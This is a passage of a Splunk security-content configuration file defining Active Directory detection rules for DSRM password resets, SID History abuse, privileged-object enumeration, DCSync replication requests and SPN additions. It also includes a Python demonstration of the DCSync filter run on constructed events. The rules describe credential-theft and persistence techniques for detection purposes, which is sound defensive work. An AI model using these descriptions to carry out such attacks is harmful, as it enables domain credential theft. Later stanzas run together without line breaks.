action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD DSRM Password Reset - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a domain. A DC can be configured to allow the DSRM account to log on and be used in the same way as a local administrator account. This detection looks for any password reset attempts against that account (EventCode 4794).
action.notable.param.rule_title = Windows AD DSRM Password Reset
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` min(_time) as _time from datamodel=Change where All_Changes.result_id="4794" AND All_Changes.result="An attempt was made to set the Directory Services Restore Mode administrator password" by All_Changes.action, All_Changes.dest, All_Changes.src, All_Changes.user | `drop_dm_object_name(All_Changes)` | `windows_ad_dsrm_password_reset_filter`

[ESCU - Windows AD Privileged Account SID History Addition - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection identifies when the SID of a privileged user is added to the SID History attribute of another user. It is useful for tracking SID History abuse across multiple domains. This detection leverages the Assets and Identities framework; see the implementation section for configuration details.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This detection identifies when the SID of a privileged user is added to the SID History attribute of another user. It is useful for tracking SID History abuse across multiple domains. This detection leverages the Assets and Identities framework; see the implementation section for configuration details.
action.escu.how_to_implement = Ensure you have the objectSid and the down-level logon name (`DOMAIN\sAMAccountName`) added to the identity field of your Assets and Identities lookup, along with the category `privileged` for the applicable users. Ensure you are ingesting EventCodes 4742 and 4738. Two Advanced Security Audit Policy settings, `Audit User Account Management` and `Audit Computer Account Management` under `Account Management`, are required to generate these event codes.
action.escu.known_false_positives = Migration of privileged accounts.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD Privileged Account SID History Addition - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"]
action.risk = 1
action.risk.param._risk_message = A Privileged User Account SID History Attribute was added to $userSid$ by $src_user$
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD Privileged Account SID History Addition - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection identifies when the SID of a privileged user is added to the SID History attribute of another user. It is useful for tracking SID History abuse across multiple domains. This detection leverages the Assets and Identities framework; see the implementation section for configuration details.
action.notable.param.rule_title = Windows AD Privileged Account SID History Addition
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` (EventCode=4742 OR EventCode=4738) NOT SidHistory IN ("%%1793", -) | rex field=SidHistory "(^%{|^)(?P<SidHistory>.*?)(}$|$)" | eval category="privileged" | lookup identity_lookup_expanded category, identity as SidHistory OUTPUT identity_tag as match | where isnotnull(match) | rename TargetSid as userSid | table _time action status host user userSid SidHistory Logon_ID src_user | `windows_ad_privileged_account_sid_history_addition_filter`

[ESCU - Windows AD Privileged Object Access Activity - Rule]
action.escu = 0
action.escu.enabled = 1
description = Windows Active Directory contains numerous objects that grant elevated access to the domain they reside in. These objects should rarely be accessed by normal users or processes. Access attempts to one or more of these objects may be evidence of attacker enumeration of Active Directory.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.002"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = Windows Active Directory contains numerous objects that grant elevated access to the domain they reside in. These objects should rarely be accessed by normal users or processes. Access attempts to one or more of these objects may be evidence of attacker enumeration of Active Directory.
action.escu.how_to_implement = Enable `Audit Directory Service Access` via GPO and collect EventCode 4662. The required SACLs need to be created for the relevant objects. Be aware that the Splunk Add-on for Windows filters this event code by default through a `blacklist` entry in its `inputs.conf`; that entry must be adjusted for the events to reach Splunk.
action.escu.known_false_positives = Service accounts or applications that routinely query Active Directory for information.
action.escu.creation_date = 2023-06-01
action.escu.modification_date = 2023-06-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD Privileged Object Access Activity - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
action.risk = 1
action.risk.param._risk_message = The account $user$ accessed $object_count$ privileged AD object(s).
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "object_name", "risk_object_type": "other", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD Privileged Object Access Activity - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Windows Active Directory contains numerous objects that grant elevated access to the domain they reside in. These objects should rarely be accessed by normal users or processes. Access attempts to one or more of these objects may be evidence of attacker enumeration of Active Directory.
action.notable.param.rule_title = Windows AD Privileged Object Access Activity
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4662 ObjectName IN ( "CN=Account Operators,*", "CN=Administrators,*", "CN=Backup Operators,*", "CN=Cert Publishers,*", "CN=Certificate Service DCOM Access,*", "CN=Domain Admins,*", "CN=Domain Controllers,*", "CN=Enterprise Admins,*", "CN=Enterprise Read-only Domain Controllers,*", "CN=Group Policy Creator Owners,*", "CN=Incoming Forest Trust Builders,*", "CN=Microsoft Exchange Servers,*", "CN=Network Configuration Operators,*", "CN=Power Users,*", "CN=Print Operators,*", "CN=Read-only Domain Controllers,*", "CN=Replicators,*", "CN=Schema Admins,*", "CN=Server Operators,*", "CN=Exchange Trusted Subsystem,*", "CN=Exchange Windows Permission,*", "CN=Organization Management,*") | rex field=ObjectName "CN\=(?<object_name>[^,]+)" | stats values(Computer) as dest, values(object_name) as object_name, dc(ObjectName) as object_count, min(_time) as firstTime, max(_time) as lastTime, count by SubjectUserName | rename SubjectUserName as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_ad_privileged_object_access_activity_filter`

[ESCU - Windows AD Replication Request Initiated by User Account - Rule]
action.escu = 0
action.escu.enabled = 1
description = This alert was written to detect activity associated with the DCSync attack. When a domain controller receives a replication request, the requesting account's permissions are validated, but no check is performed to confirm that the request actually came from a domain controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a user account (rather than a computer account or SYSTEM) opens a handle to the domainDNS object with the replication control-access rights.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.006", "T1003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Authentication", "Change"]
action.escu.eli5 = This alert was written to detect activity associated with the DCSync attack. When a domain controller receives a replication request, the requesting account's permissions are validated, but no check is performed to confirm that the request actually came from a domain controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a user account (rather than a computer account or SYSTEM) opens a handle to the domainDNS object with the replication control-access rights.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting EventCode `4662`. The Advanced Security Audit Policy setting `Audit Directory Service Access` within `DS Access` needs to be enabled, and the following SACLs must be applied to the domain root and all descendant objects: for the principals `Everyone`, `Domain Computers` and `Domain Controllers`, audit the permissions `Replicating Directory Changes`, `Replicating Directory Changes All` and `Replicating Directory Changes In Filtered Set`.
action.escu.known_false_positives = Azure AD Connect syncing operations.
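# Added example, not part of the Splunk content or of the search in this stanza: the 4662
# filter of the search and its join to 4624 on the logon id, run in Python over constructed
# events so that each exclusion (machine accounts, SYSTEM, requests that are not control
# access) can be seen to work and the source address can be recovered. Events, host names,
# SIDs and the 10.20.30.40 address are constructed; parse_event() is a minimal stand-in for
# the Windows TA's field extraction, not the TA's own code.

```python
import re

# Values the search matches in the 4662 event, as rendered by Windows.
DOMAIN_DNS_TYPES = {"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "domainDNS"}
REPL_RIGHT_GUIDS = (
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",   # DS-Replication-Get-Changes-All
    "{9923a32a-3607-11d2-b9be-0000f87a36b2}",   # DS-Install-Replica
    "{1131f6ac-9c07-11d1-f79f-00c04fc2dcd2}",   # DS-Replication-Manage-Topology
)
CONTROL_ACCESS = "0x100"     # AccessMask for extended (control access) rights


def parse_event(text: str) -> dict:
    """Turn the classic 'Key: value' message rendering into a dict. Indented lines without
    a colon (the GUID list under Properties) are appended to the previous key. In a real
    4624 the key 'Logon ID' occurs twice; the second (New Logon) one is the TargetLogonId
    and, being last, is the one kept here."""
    fields, key = {}, None
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Za-z ]+?):\s*(.*?)\s*$", line)
        if m:
            key, value = m.groups()
            fields[key] = value
        elif key is not None and line.strip():
            fields[key] = (fields[key] + " " + line.strip()).strip()
    return fields


def is_user_initiated_replication(ev: dict) -> bool:
    """The 4662 filter of the search, one clause per condition."""
    if ev.get("EventCode") != "4662" or ev.get("Object Type") not in DOMAIN_DNS_TYPES:
        return False
    props = ev.get("Properties", "")
    if "Replicating Directory Changes All" not in props and not any(g in props for g in REPL_RIGHT_GUIDS):
        return False
    if ev.get("Access Mask") != CONTROL_ACCESS:
        return False
    sid, domain, name = ev.get("Security ID", ""), ev.get("Account Domain", ""), ev.get("Account Name", "")
    # NOT (SubjectUserSid="NT AUT*" OR SubjectUserSid="S-1-5-18" OR SubjectDomainName="Window Manager" OR SubjectUserName="*$")
    excluded = sid.startswith("NT AUT") or sid == "S-1-5-18" or domain == "Window Manager" or name.endswith("$")
    return not excluded


def correlate(events) -> list:
    """Keep qualifying 4662s and attach the source address from the 4624 that shares the
    logon id; the search does this with `map search="... EventCode=4624 TargetLogonId=$TargetLogonId$"`."""
    parsed = [parse_event(e) for e in events]
    logons = {ev.get("Logon ID"): ev for ev in parsed if ev.get("EventCode") == "4624"}
    results = {}
    for ev in parsed:
        if not is_user_initiated_replication(ev):
            continue
        logon_id = ev.get("Logon ID")
        logon = logons.get(logon_id, {})
        row = results.setdefault(logon_id, {
            "TargetLogonId": logon_id,
            "user": ev.get("Account Name"),
            "Target_Domain": ev.get("Account Domain"),
            "Computer": ev.get("Computer"),
            "src_ip": logon.get("Source Network Address"),
            "LogonType": logon.get("Logon Type"),
            "count": 0,
        })
        row["count"] += 1
    return list(results.values())


# Constructed sample events (not real telemetry), classic message rendering.
SAMPLE_EVENTS = [
    # the network logon the 4662 below will be joined to
    "EventCode: 4624\nComputer: DC01.corp.example\nLogon Type: 3\n"
    "Account Name: jdoe\nAccount Domain: CORP\nLogon ID: 0x3E4F12\n"
    "Source Network Address: 10.20.30.40",
    # jdoe opens domainDNS with control access for Get-Changes-All: the DCSync signature
    "EventCode: 4662\nComputer: DC01.corp.example\n"
    "Security ID: S-1-5-21-1111111111-2222222222-3333333333-1105\n"
    "Account Name: jdoe\nAccount Domain: CORP\nLogon ID: 0x3E4F12\n"
    "Object Type: %{19195a5b-6da0-11d0-afd3-00c04fd930c9}\nAccess Mask: 0x100\n"
    "Properties: Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
    "\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    # a domain controller's machine account doing the same: normal replication, excluded
    "EventCode: 4662\nComputer: DC01.corp.example\n"
    "Security ID: S-1-5-21-1111111111-2222222222-3333333333-1001\n"
    "Account Name: DC02$\nAccount Domain: CORP\nLogon ID: 0x1A2B3C\n"
    "Object Type: domainDNS\nAccess Mask: 0x100\n"
    "Properties: Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # jdoe reading a domainDNS property (not a control-access request), excluded
    "EventCode: 4662\nComputer: DC01.corp.example\n"
    "Security ID: S-1-5-21-1111111111-2222222222-3333333333-1105\n"
    "Account Name: jdoe\nAccount Domain: CORP\nLogon ID: 0x3E4F12\n"
    "Object Type: domainDNS\nAccess Mask: 0x10\n"
    "Properties: Read Property\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    # SYSTEM on the DC itself, excluded by the SID filter
    "EventCode: 4662\nComputer: DC01.corp.example\nSecurity ID: S-1-5-18\n"
    "Account Name: SYSTEM\nAccount Domain: NT AUTHORITY\nLogon ID: 0x3E7\n"
    "Object Type: domainDNS\nAccess Mask: 0x100\n"
    "Properties: Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
]


def run_sample():
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for row in run_sample():
        print(row)
```

# The join is what makes the alert actionable: 4662 carries no network source, so the 4624
# with the same logon id is the only place src_ip (and the logon type) can come from. In the
# search that costs one `map` subsearch per qualifying logon id, which is acceptable only
# because the 4662 filter leaves very few rows.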
action.escu.creation_date = 2024-01-05
action.escu.modification_date = 2024-01-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD Replication Request Initiated by User Account - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks", "Credential Dumping"]
action.risk = 1
action.risk.param._risk_message = Windows Active Directory Replication Request Initiated by User Account $user$ at $src_ip$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD Replication Request Initiated by User Account - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks", "Credential Dumping"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.006", "T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This alert was written to detect activity associated with the DCSync attack. When a domain controller receives a replication request, the requesting account's permissions are validated, but no check is performed to confirm that the request actually came from a domain controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a user account (rather than a computer account or SYSTEM) opens a handle to the domainDNS object with the replication control-access rights.
action.notable.param.rule_title = Windows AD Replication Request Initiated by User Account
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4662 ObjectType IN ("%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "domainDNS") AND Properties IN ("*Replicating Directory Changes All*", "*{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}*", "*{9923a32a-3607-11d2-b9be-0000f87a36b2}*","*{1131f6ac-9c07-11d1-f79f-00c04fc2dcd2}*") AND AccessMask="0x100" AND NOT (SubjectUserSid="NT AUT*" OR SubjectUserSid="S-1-5-18" OR SubjectDomainName="Window Manager" OR SubjectUserName="*$") | stats min(_time) as _time, count by SubjectDomainName, SubjectUserName, Computer, Logon_ID, ObjectName, ObjectServer, ObjectType, OperationType, status | rename SubjectDomainName as Target_Domain, SubjectUserName as user, Logon_ID as TargetLogonId, _time as attack_time | appendpipe [| map search="search `wineventlog_security` EventCode=4624 TargetLogonId=$TargetLogonId$"] | table attack_time, AuthenticationPackageName, LogonProcessName, LogonType, TargetUserSid, Target_Domain, user, Computer, TargetLogonId, status, src_ip, src_category, ObjectName, ObjectServer, ObjectType, OperationType | stats min(attack_time) as _time values(TargetUserSid) as TargetUserSid, values(Target_Domain) as Target_Domain, values(user) as user, values(Computer) as Computer, values(status) as status, values(src_category) as src_category, values(src_ip) as src_ip by TargetLogonId | `windows_ad_replication_request_initiated_by_user_account_filter`

[ESCU - Windows AD Replication Request Initiated from Unsanctioned Location - Rule]
action.escu = 0
action.escu.enabled = 1
description = 
This alert was written to detect activity associated with the DCSync attack performed by computer accounts. When a domain controller receives a replication request, the account permissions are validated, however no checks are performed to validate the request was initiated by a Domain Controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a computer account account creates a handle to domainDNS with the necessary replication permissions. These requests are then filtered to exclude where the events originate from a known domain controller IP address. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.006", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication", "Change"] action.escu.eli5 = This alert was written to detect activity associated with the DCSync attack performed by computer accounts. When a domain controller receives a replication request, the account permissions are validated, however no checks are performed to validate the request was initiated by a Domain Controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a computer account account creates a handle to domainDNS with the necessary replication permissions. These requests are then filtered to exclude where the events originate from a known domain controller IP address. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcode `4662`. The Advanced Security Audit policy settings `Audit Directory Services Access` within `DS Access` needs to be enabled, as well as the following SACLs applied to the domain root and all descendant objects. 
The principals `everybody`, `Domain Computers`, and `Domain Controllers` auditing the permissions `Replicating Directory Changes`, `Replicating Directory Changes All`, and `Replicating Directory Changes In Filtered Set` Assets and Identities will also need to be configured, with the category of domain_controller added for domain controllers. action.escu.known_false_positives = Genuine DC promotion may trigger this alert. action.escu.creation_date = 2024-01-05 action.escu.modification_date = 2024-01-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Replication Request Initiated from Unsanctioned Location - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks", "Credential Dumping"] action.risk = 1 action.risk.param._risk_message = Windows Active Directory Replication Request Initiated from Unsanctioned Location $src_ip$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Replication Request Initiated from Unsanctioned Location - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks", "Credential Dumping"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.006", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This alert was written to 
detect activity associated with the DCSync attack performed by computer accounts. When a domain controller receives a replication request, the account permissions are validated, however no checks are performed to validate the request was initiated by a Domain Controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a computer account account creates a handle to domainDNS with the necessary replication permissions. These requests are then filtered to exclude where the events originate from a known domain controller IP address. action.notable.param.rule_title = Windows AD Replication Request Initiated from Unsanctioned Location action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4662 ObjectType IN ("%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "domainDNS") AND Properties IN ("*Replicating Directory Changes All*", "*{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}*", "*{9923a32a-3607-11d2-b9be-0000f87a36b2}*","*{1131f6ac-9c07-11d1-f79f-00c04fc2dcd2}*") AND AccessMask="0x100" AND (SubjectUserSid="NT AUT*" OR SubjectUserSid="S-1-5-18" OR SubjectDomainName="Window Manager" OR SubjectUserName="*$") | stats min(_time) as attack_time, count by SubjectDomainName, SubjectUserName, Computer, Logon_ID, ObjectName, ObjectServer, ObjectType, OperationType, status | rename SubjectDomainName as Target_Domain, SubjectUserName as user, Logon_ID as TargetLogonId | appendpipe [| map search="search `wineventlog_security` EventCode=4624 TargetLogonId=$TargetLogonId$"] | table attack_time, AuthenticationPackageName, LogonProcessName, LogonType, TargetUserSid, Target_Domain, user, Computer, TargetLogonId, status, src_ip, 
src_category, ObjectName, ObjectServer, ObjectType, OperationType | stats min(attack_time) as _time, values(TargetUserSid) as TargetUserSid, values(Target_Domain) as Target_Domain, values(user) as user, values(Computer) as Computer, values(status) as status, values(src_category) as src_category, values(src_ip) as src_ip by TargetLogonId | search NOT src_category="domain_controller" | `windows_ad_replication_request_initiated_from_unsanctioned_location_filter` [ESCU - Windows AD Same Domain SID History Addition - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects which exist within the same domain. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. This analytic was written to pick up on activity via Mimikatz sid::patch. Please note there are additional avenues to abuse SID history such as DCShadow & Golden / Diamond tickets which won't be detected using these event codes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects which exist within the same domain. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. 
This analytic was written to pick up on activity via Mimikatz sid::patch. Please note there are additional avenues to abuse SID history such as DCShadow & Golden / Diamond tickets which won't be detected using these event codes. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcodes `4738` and `4742`. The Advanced Security Audit policy settings `Audit User Account Management` and `Audit Computer Account Management` within `Account Management` all need to be enabled. SID resolution is not required.. action.escu.known_false_positives = Unknown action.escu.creation_date = 2022-09-09 action.escu.modification_date = 2022-09-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Same Domain SID History Addition - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks", "Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = Active Directory SID History Attribute was added to $user$ by $src_user$ action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Same Domain SID History Addition - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]} schedule_window = 
auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects which exist within the same domain. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. This analytic was written to pick up on activity via Mimikatz sid::patch. Please note there are additional avenues to abuse SID history such as DCShadow & Golden / Diamond tickets which won't be detected using these event codes. action.notable.param.rule_title = Windows AD Same Domain SID History Addition action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` (EventCode=4742 OR EventCode=4738) NOT SidHistory IN ("%%1793", -) | rex field=SidHistory "(^%{|^)(?P.*)(\-|\\\)" | rex field=TargetSid "^(?P.*)(\-|\\\)" | where SidHistoryMatch=TargetSidmatch OR SidHistoryMatch=TargetDomainName | rename TargetSid as userSid, TargetDomainName as userDomainName | table _time action status host user userSid userDomainName SidHistory Logon_ID src_user | `windows_ad_same_domain_sid_history_addition_filter` [ESCU - Windows AD ServicePrincipalName Added To Domain Account - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a Service Principal Name to a domain account. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. 
Domain accounts with Servce Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a Service Principal Name to a domain account. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Servce Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. action.escu.how_to_implement = To successfully implement this search, you ned to be ingesting eventcode `5136`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. Additionally, a SACL needs to be created for AD objects in order to ingest attribute modifications. action.escu.known_false_positives = A Service Principal Name should only be added to an account when an application requires it. While infrequent, this detection may trigger on legitimate actions. Filter as needed. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD ServicePrincipalName Added To Domain Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A Servince Principal Name for $ObjectDN$ was set by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "ObjectDN", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD ServicePrincipalName Added To Domain Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a Service Principal Name to a domain account. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Servce Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. 
